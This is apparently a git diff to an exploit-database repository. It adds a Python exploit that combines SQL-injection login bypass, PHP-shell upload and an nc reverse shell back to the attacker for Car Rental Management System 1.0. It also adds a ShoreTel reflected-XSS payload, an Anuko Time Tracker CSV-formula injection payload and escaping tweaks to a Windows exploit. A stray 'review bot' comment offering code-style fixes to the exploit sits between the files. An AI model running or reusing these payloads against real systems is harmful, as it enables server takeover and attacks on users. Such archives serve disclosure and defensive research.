diff --git a/exploits/php/webapps/49025.py b/exploits/php/webapps/49025.py
new file mode 100755
index 000000000..8c0be1ca4
--- /dev/null
+++ b/exploits/php/webapps/49025.py
@@ -0,0 +1,87 @@
+# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
+# Date: 09-11-2020
+# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Debian 10 with apache2
+
+# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
+# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
+# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
+# on the victim system
+#
+# on the Attacker machine you must listen with NC on a port
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+#foxlox#
+
+
+
+payload = {"username":"' OR 1=1 limit 1#","password":"moana"}
+
+proxies = { "http": "http://localhost:8080"}
+
+#payload = "username=' OR 1=1 limit 1 #&password=ciao"
+
+def deb(str):
+ print("Debug => "+str)
+
+def login():
+ deb("Login...")
+ session=requests.Session()
+ url = mainurl+"/admin/ajax.php?action=login"
+ #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
+ r=session.post(url,payload, allow_redirects=False,proxies=proxies)
+ cookie = r.headers["Set-Cookie"]
+ deb(cookie)
+ return cookie
+
+def find_all(a_str, sub,lbegin,lend):
+ start = 0
+ start = a_str.find(sub, start)
+ t=(a_str[start+lbegin:start+lend]).replace('"','')
+ return t
+
+
+def upload(c):
+ deb("Getting cookie")
+ c = c.split("=");cookie={c[0]:c[1]}
+ deb("Sending payload")
+ filetosend=files = {'img': ('s_hell.php', '\n')}
+ fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", 
"category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
+ r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
+ deb("Saved Machine");
+ r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
+ mid=find_all(r.content,'data-id=',8,11)
+ deb("Machine id: "+mid)
+ r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
+ defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
+ deb("Exploit url: "+defurl)
+ #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
+ exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
+ print("Opening url: "+exploit)
+ print("Don't forget to run: nc -nvlp "+sys.argv[3])
+ os.system(exploit)
+
+
+def usage():
+ if len(sys.argv) < 4:
+ print("Create a PHPShell for Car Rental Management System")
+ print("example:")
+ print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
+ exit()
+
+
+
+usage()
+mainurl = sys.argv[1]
+upload(login())
+
+#fox
\ No newline at end of file
diff --git a/exploits/php/webapps/49026.txt b/exploits/php/webapps/49026.txt
new file mode 100644
index 000000000..77c1f72e9
--- /dev/null
+++ b/exploits/php/webapps/49026.txt
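Review bot: The usage text printed by `usage()` names the script `exploit_CMS_Car_management_system.py`, while the file is committed as `exploits/php/webapps/49025.py`, so the documented example invocation does not match the file a reader actually has; `print("python 49025.py URL_BASE YOURIP YOURPORT")` would keep the two in step. The helper `deb(str)` shadows the builtin `str` for its parameter name, which reads as a type annotation at a glance; `def deb(msg):` with `print("Debug => "+msg)` avoids that. `time`, `random`, `http.cookiejar`, `os.path` and `from os import path` are imported but never referenced anywhere in the new file and can be removed; `os` itself is used only through `os.path`, so `import os` would be needed if that line went. The module-level `proxies` dict routes every request through `http://localhost:8080`, yet the header comment does not mention that a proxy must be listening there, which is worth one line in the header or a `#` comment on the dict.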
@@ -0,0 +1,23 @@
+# Exploit Title: ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting
+# Date: 11/8/2020
+# Exploit Author: Joe Helle
+# Vendor Homepage: https://www.mitel.com/articles/what-happened-shoretel-products
+# Version: 19.46.1802.0
+# Tested on: Linux
+# CVE: 2020-28351
+
+PoC:
+
+The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could
+allow an unauthenticated attacker to conduct a reflected cross-site
+scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient
+validation for the time_zone object in the HOME_MEETING& page.
+
+Vulnerable payload
+/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME
+
+Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown
+object is located. Upon executing the payload, the exploit executes when
+the mouse is rolled over the dropdown menu object.
+
+https://github.com/dievus/CVE-2020-28351
\ No newline at end of file
diff --git a/exploits/php/webapps/49027.txt b/exploits/php/webapps/49027.txt
new file mode 100644
index 000000000..6223bbaa7
--- /dev/null
+++ b/exploits/php/webapps/49027.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection
+# Date: 2020-10-17
+# Exploit Author: Mufaddal Masalawala
+# Vendor Homepage: https://www.anuko.com/
+# Software Link: https://www.anuko.com/time-tracker/index.htm
+# Version: 1.19.23.5325
+# Tested on: Kali Linux 2020.3
+# CVE: CVE-2020-15255
+# Proof Of Concept:
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and
+Note data field that is mistreated while exporting to a CSV file.
+To exploit this vulnerability:
+
+ 1. Login to the application, goto 'User' module and edit the user
+ 2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the
+ 'Name' field
+ 3. Goto 'Project' module, add a new project with the same malicious
+ payload in the 'Name' field
+ 4. Goto 'Time' module, select our created User, Project and again enter
+ the same payload in 'Note' field
+ 5. Enter the rest of the details and click 'Submit'
+ 6. Now goto 'Reports' click Generateand download the CSV file
+ 7. Open the CSV file, allow all popups and our payload is executed
+ (calculator is opened).
\ No newline at end of file
diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py
index ae9e6b47a..5e2283930 100755
--- a/exploits/windows/remote/48657.py
+++ b/exploits/windows/remote/48657.py
@@ -149,7 +149,7 @@ xml_schema = """
-""".replace("<", "<").replace(">", ">").replace('"', """).strip()
+""".replace("<", "<").replace(">", ">").replace('"', """).strip()
 # endregion
 # region xml_diffgram
@@ -234,16 +234,16 @@ config = """
 def prepare_update_config(uuid, cmd):
 config_payload = config
 config_payload = config_payload.replace('{CMD}', cmd)
- config_payload = config_payload.replace('<', '<')
- config_payload = config_payload.replace('>', '>')
+ config_payload = config_payload.replace('<', '<')
+ config_payload = config_payload.replace('>', '>')
 diffgram_payload = xml_diffgram
 diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
 diffgram_payload = diffgram_payload.replace('{ID}', uuid)
- diffgram_payload = diffgram_payload.replace('&', '&')
- diffgram_payload = diffgram_payload.replace('<', '<')
- diffgram_payload = diffgram_payload.replace('>', '>')
- diffgram_payload = diffgram_payload.replace('"', '"')
+ diffgram_payload = diffgram_payload.replace('&', '&')
+ diffgram_payload = diffgram_payload.replace('<', '<')
+ diffgram_payload = diffgram_payload.replace('>', '>')
+ diffgram_payload = diffgram_payload.replace('"', '"')
 payload = update_config
 payload = payload.replace('{XMLSCHEMA}', xml_schema)
diff --git a/files_exploits.csv b/files_exploits.csv
index 4d7871005..e51359df6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40842,6 +40842,9 @@ id,file,description,date,author,type,platform,port
 49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware,
 49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php,
 49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple,
+49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,
+49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php,
+49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,